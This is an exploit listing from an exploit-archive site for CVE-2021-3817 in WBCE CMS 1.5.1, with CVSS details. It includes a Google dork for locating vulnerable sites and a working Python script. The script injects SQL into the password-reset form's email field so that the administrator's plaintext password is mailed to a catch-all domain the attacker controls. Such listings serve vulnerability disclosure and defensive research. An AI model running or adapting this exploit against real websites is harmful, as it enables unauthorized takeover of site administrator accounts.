WBCE CMS 1.5.1 Admin Password Reset

2021.12.20
Credit: citril
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: WBCE CMS 1.5.1 - Admin Password Reset # Google Dork: intext: "Way Better Content Editing" # Date: 20/12/2021 # Exploit Author: citril or https://github.com/maxway2021 # Vendor Homepage: https://wbce.org/ # Software Link: https://wbce.org/de/downloads/ # Version: <= 1.5.1 # Tested on: Linux # CVE : CVE-2021-3817 # Github repo: https://github.com/WBCE/WBCE_CMS # Writeup: https://medium.com/@citril/cve-2021-3817-from-sqli-to-plaintext-admin-password-recovery-13735773cc75 import requests _url = 'http://localhost/wbce/admin/login/forgot/index.php' # from mylocalhost environment _domain = 'pylibs.org' # you have to catch all emails! I used Namecheap domain controller's 'catch all emails and redirect to specific email address' feature headers = { 'User-Agent': 'Mozilla/5.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Content-Type': 'application/x-www-form-urlencoded', 'Connection': 'close' } _p = "email=%27/**/or/**/user_id=1/**/or/**/'admin%40" + _domain + "&submit=justrandomvalue" r = requests.post(url = _url, headers = headers, data = _p) if r.status_code == 200: print('[+] Check your email, you are probably going to receive plaintext password which belongs to administrator.')


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top